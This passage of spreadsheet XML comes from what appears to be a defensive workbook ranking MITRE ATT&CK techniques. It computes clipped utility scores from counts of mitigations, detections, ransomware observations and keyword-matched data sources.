      <c r="K447">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L447">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M447" s="25">
        <v>0</v>
      </c>
      <c r="N447" s="51">
        <v>0</v>
      </c>
      <c r="O447" s="51">
        <v>3</v>
      </c>
      <c r="P447" s="51">
        <v>0</v>
      </c>
      <c r="Q447" s="51">
        <v>0</v>
      </c>
      <c r="R447" s="51"/>
      <c r="S447" s="51">
        <v>0</v>
      </c>
      <c r="T447" s="51"/>
      <c r="U447" s="51">
        <v>0</v>
      </c>
      <c r="V447" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>1.4285714285714284E-2</v>
      </c>
      <c r="W447">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X447">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y447">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z447">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>3</v>
      </c>
      <c r="AA447">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.03</v>
      </c>
      <c r="AB447">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.03</v>
      </c>
      <c r="AC447" s="29"/>
      <c r="AD447" s="25" t="str" cm="1">
        <f t="array" ref="AD447">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC447)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE447" s="25">
        <f>IF(AD447="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF447" s="25" t="str" cm="1">
        <f t="array" ref="AF447">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC447)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG447" s="25">
        <f>IF(AF447="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH447" s="25" t="str" cm="1">
        <f t="array" ref="AH447">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC447)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI447" s="25">
        <f>IF(AH447="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ447" s="25" t="str" cm="1">
        <f t="array" ref="AJ447">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC447)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK447" s="25">
        <f>IF(AJ447="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL447" s="25" t="str" cm="1">
        <f t="array" ref="AL447">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC447)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM447" s="25">
        <f>IF(AL447="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN447" s="60">
        <v>1</v>
      </c>
      <c r="AO447" s="51">
        <v>1</v>
      </c>
      <c r="AP447" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.9761904761904762E-2</v>
      </c>
      <c r="AQ447" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>2.1428571428571425E-2</v>
      </c>
      <c r="AR447" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>2.1428571428571425E-2</v>
      </c>
      <c r="AS447" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT447" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU44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48" spans="1:47" ht="32.1">
      <c r="A448" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.4566666666666665E-2</v>
      </c>
      <c r="B448" s="25">
        <f>SUM(H448,M448,V448)*(1+SUM(AE448,AG448,AI448,AK448,AM448))</f>
        <v>0.14566666666666667</v>
      </c>
      <c r="C448" s="25" t="s">
        <v>1665</v>
      </c>
      <c r="D448" s="25" t="s">
        <v>143</v>
      </c>
      <c r="E448" s="25" t="s">
        <v>1666</v>
      </c>
      <c r="F448" s="51">
        <v>1</v>
      </c>
      <c r="G448" s="51">
        <v>1</v>
      </c>
      <c r="H448" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I448">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J448">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K448">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L448">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M448" s="25">
        <v>0</v>
      </c>
      <c r="N448" s="51">
        <v>0</v>
      </c>
      <c r="O448" s="51">
        <v>0</v>
      </c>
      <c r="P448" s="51">
        <v>0</v>
      </c>
      <c r="Q448" s="51">
        <v>0</v>
      </c>
      <c r="R448" s="51"/>
      <c r="S448" s="51">
        <v>0</v>
      </c>
      <c r="T448" s="51" t="s">
        <v>1667</v>
      </c>
      <c r="U448" s="51">
        <v>1</v>
      </c>
      <c r="V448" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>9.5238095238095247E-3</v>
      </c>
      <c r="W448">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>1</v>
      </c>
      <c r="X448">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>1.8181818181818181E-2</v>
      </c>
      <c r="Y448">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>1.8181818181818181E-2</v>
      </c>
      <c r="Z448">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA448">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB448">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC448" s="29" t="s">
        <v>1668</v>
      </c>
      <c r="AD448" s="25" t="str" cm="1">
        <f t="array" ref="AD448">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC448)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE448" s="25">
        <f>IF(AD448="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF448" s="25" t="str" cm="1">
        <f t="array" ref="AF448">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC448)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG448" s="25">
        <f>IF(AF448="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH448" s="25" t="str" cm="1">
        <f t="array" ref="AH448">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC448)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI448" s="25">
        <f>IF(AH448="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ448" s="25" t="str" cm="1">
        <f t="array" ref="AJ448">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC448)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK448" s="25">
        <f>IF(AJ448="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL448" s="25" t="str" cm="1">
        <f t="array" ref="AL448">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC448)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM448" s="25">
        <f>IF(AL448="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN448" s="60">
        <v>0</v>
      </c>
      <c r="AO448" s="51">
        <v>0</v>
      </c>
      <c r="AP448" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.4566666666666665E-2</v>
      </c>
      <c r="AQ448" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.8555555555555553E-2</v>
      </c>
      <c r="AR448" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.8555555555555553E-2</v>
      </c>
      <c r="AS448" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT448" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU44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49" spans="1:47" ht="63.95">
      <c r="A449" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.1233333333333324E-2</v>
      </c>
      <c r="B449" s="25">
        <f>SUM(H449,M449,V449)*(1+SUM(AE449,AG449,AI449,AK449,AM449))</f>
        <v>0.14566666666666667</v>
      </c>
      <c r="C449" s="25" t="s">
        <v>1669</v>
      </c>
      <c r="D449" s="25" t="s">
        <v>271</v>
      </c>
      <c r="E449" s="25" t="s">
        <v>1670</v>
      </c>
      <c r="F449" s="51">
        <v>1</v>
      </c>
      <c r="G449" s="51">
        <v>1</v>
      </c>
      <c r="H449" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I449">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J449">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K449">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L449">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M449" s="25">
        <v>0</v>
      </c>
      <c r="N449" s="51">
        <v>0</v>
      </c>
      <c r="O449" s="51">
        <v>1</v>
      </c>
      <c r="P449" s="51">
        <v>1</v>
      </c>
      <c r="Q449" s="51">
        <v>0</v>
      </c>
      <c r="R449" s="51"/>
      <c r="S449" s="51">
        <v>0</v>
      </c>
      <c r="T449" s="51"/>
      <c r="U449" s="51">
        <v>0</v>
      </c>
      <c r="V449" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>9.5238095238095229E-3</v>
      </c>
      <c r="W449">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X449">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y449">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z449">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>2</v>
      </c>
      <c r="AA449">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.02</v>
      </c>
      <c r="AB449">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.02</v>
      </c>
      <c r="AC449" s="29" t="s">
        <v>1671</v>
      </c>
      <c r="AD449" s="25" t="str" cm="1">
        <f t="array" ref="AD449">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC449)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE449" s="25">
        <f>IF(AD449="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF449" s="25" t="str" cm="1">
        <f t="array" ref="AF449">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC449)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG449" s="25">
        <f>IF(AF449="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH449" s="25" t="str" cm="1">
        <f t="array" ref="AH449">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC449)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI449" s="25">
        <f>IF(AH449="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ449" s="25" t="str" cm="1">
        <f t="array" ref="AJ449">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC449)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK449" s="25">
        <f>IF(AJ449="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL449" s="25" t="str" cm="1">
        <f t="array" ref="AL449">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC449)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM449" s="25">
        <f>IF(AL449="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN449" s="52">
        <v>2</v>
      </c>
      <c r="AO449" s="51">
        <v>1</v>
      </c>
      <c r="AP449" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.1233333333333324E-2</v>
      </c>
      <c r="AQ449" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.8555555555555553E-2</v>
      </c>
      <c r="AR449" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.8555555555555553E-2</v>
      </c>
      <c r="AS449" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT449" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU44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50" spans="1:47" ht="63.95">
      <c r="A450" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.7899999999999998E-2</v>
      </c>
      <c r="B450" s="25">
        <f>SUM(H450,M450,V450)*(1+SUM(AE450,AG450,AI450,AK450,AM450))</f>
        <v>0.14566666666666667</v>
      </c>
      <c r="C450" s="25" t="s">
        <v>1672</v>
      </c>
      <c r="D450" s="25" t="s">
        <v>1673</v>
      </c>
      <c r="E450" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F450" s="51">
        <v>1</v>
      </c>
      <c r="G450" s="51">
        <v>1</v>
      </c>
      <c r="H450" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I450">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J450">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K450">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L450">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M450" s="25">
        <v>0</v>
      </c>
      <c r="N450" s="51">
        <v>0</v>
      </c>
      <c r="O450" s="51">
        <v>2</v>
      </c>
      <c r="P450" s="51">
        <v>0</v>
      </c>
      <c r="Q450" s="51">
        <v>0</v>
      </c>
      <c r="R450" s="51"/>
      <c r="S450" s="51">
        <v>0</v>
      </c>
      <c r="T450" s="51"/>
      <c r="U450" s="51">
        <v>0</v>
      </c>
      <c r="V450" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>9.5238095238095229E-3</v>
      </c>
      <c r="W450">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X450">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y450">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z450">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>2</v>
      </c>
      <c r="AA450">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.02</v>
      </c>
      <c r="AB450">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.02</v>
      </c>
      <c r="AC450" s="29" t="s">
        <v>1674</v>
      </c>
      <c r="AD450" s="25" t="str" cm="1">
        <f t="array" ref="AD450">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC450)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE450" s="25">
        <f>IF(AD450="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF450" s="25" t="str" cm="1">
        <f t="array" ref="AF450">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC450)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG450" s="25">
        <f>IF(AF450="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH450" s="25" t="str" cm="1">
        <f t="array" ref="AH450">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC450)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI450" s="25">
        <f>IF(AH450="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ450" s="25" t="str" cm="1">
        <f t="array" ref="AJ450">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC450)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK450" s="25">
        <f>IF(AJ450="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL450" s="25" t="str" cm="1">
        <f t="array" ref="AL450">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC450)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM450" s="25">
        <f>IF(AL450="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN450" s="60">
        <v>1</v>
      </c>
      <c r="AO450" s="51">
        <v>1</v>
      </c>
      <c r="AP450" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.7899999999999998E-2</v>
      </c>
      <c r="AQ450" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.8555555555555553E-2</v>
      </c>
      <c r="AR450" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.8555555555555553E-2</v>
      </c>
      <c r="AS450" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT450" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU45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51" spans="1:47" ht="32.1">
      <c r="A451" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.4566666666666665E-2</v>
      </c>
      <c r="B451" s="25">
        <f>SUM(H451,M451,V451)*(1+SUM(AE451,AG451,AI451,AK451,AM451))</f>
        <v>0.14566666666666667</v>
      </c>
      <c r="C451" s="25" t="s">
        <v>1675</v>
      </c>
      <c r="D451" s="25" t="s">
        <v>208</v>
      </c>
      <c r="E451" s="25" t="s">
        <v>1676</v>
      </c>
      <c r="F451" s="51">
        <v>1</v>
      </c>
      <c r="G451" s="51">
        <v>1</v>
      </c>
      <c r="H451" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I451">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J451">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K451">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L451">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M451" s="25">
        <v>0</v>
      </c>
      <c r="N451" s="51">
        <v>1</v>
      </c>
      <c r="O451" s="51">
        <v>1</v>
      </c>
      <c r="P451" s="51">
        <v>0</v>
      </c>
      <c r="Q451" s="51">
        <v>0</v>
      </c>
      <c r="R451" s="51"/>
      <c r="S451" s="51">
        <v>0</v>
      </c>
      <c r="T451" s="51"/>
      <c r="U451" s="51">
        <v>0</v>
      </c>
      <c r="V451" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>9.5238095238095229E-3</v>
      </c>
      <c r="W451">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X451">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y451">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z451">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>2</v>
      </c>
      <c r="AA451">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.02</v>
      </c>
      <c r="AB451">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.02</v>
      </c>
      <c r="AC451" s="29" t="s">
        <v>368</v>
      </c>
      <c r="AD451" s="25" t="str" cm="1">
